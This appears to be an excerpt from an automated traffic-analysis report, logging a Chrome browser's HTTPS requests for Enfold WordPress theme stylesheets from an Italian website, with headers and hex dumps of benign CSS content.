                                                                                                                                              2025-01-03 16:32:51 UTC2479INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 43 4f 4e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================ICON================================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              24192.168.2.164974289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3132
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC3132INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 43 4f 4e 42 4f 58 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================ICONBOX=============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              25192.168.2.164974389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 14691
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC14691INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 43 4f 4e 47 52 49 44 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================ICONGRID============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              26192.168.2.164974489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3712
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC3712INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 43 4f 4e 4c 49 53 54 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================ICONLIST============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              27192.168.2.164974689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC628OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/image.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 5506
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC5506INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 6d 61 67 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Image===============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              28192.168.2.164974589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC646OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4444
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC4444INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 6d 61 67 65 20 77 69 74 68 20 48 6f 74 73 70 6f 74 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Image with Hotspots=================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              29192.168.2.164974789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:52 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:52 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3671
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:52 UTC3671INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 4d 61 67 61 7a 69 6e 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Magazine============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              30192.168.2.164974889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:52 UTC648OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:53 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:53 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 17988
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:53 UTC16091INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 4d 61 73 6f 6e 72 79 20 47 72 69 64 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Masonry Grid========================================================================================
                                                                                                                                              2025-01-03 16:32:53 UTC1897INData Raw: 74 61 69 6e 65 72 7b 0a 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 30 70 78 29 3b 0a 09 09 66 69 6c 74 65 72 3a 62 6c 75 72 28 30 70 78 29 3b 0a 7d 0a 0a 23 74 6f 70 20 2e 61 76 2d 68 6f 76 65 72 2d 6f 76 65 72 6c 61 79 2d 62 6c 75 72 6f 6e 68 6f 76 65 72 20 2e 61 76 2d 6d 61 73 6f 6e 72 79 2d 65 6e 74 72 79 3a 68 6f 76 65 72 20 2e 61 76 2d 6d 61 73 6f 6e 72 79 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 0a 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 31 30 70 78 29 3b 0a 09 09 66 69 6c 74 65 72 3a 62 6c 75 72 28 31 30 70 78 29 3b 0a 7d 0a 0a 0a 0a 0a 0a 0a 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 38 30 30 70 78 29 7b 0a 20 2e 72 65 73 70 6f 6e
                                                                                                                                              Data Ascii: tainer{-webkit-filter:blur(0px);filter:blur(0px);}#top .av-hover-overlay-bluronhover .av-masonry-entry:hover .av-masonry-image-container{-webkit-filter:blur(10px);filter:blur(10px);}@media only screen and (min-width: 1800px){ .respon


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              31192.168.2.164974989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:53 UTC609OUTGET /wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:53 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:53 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2178
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
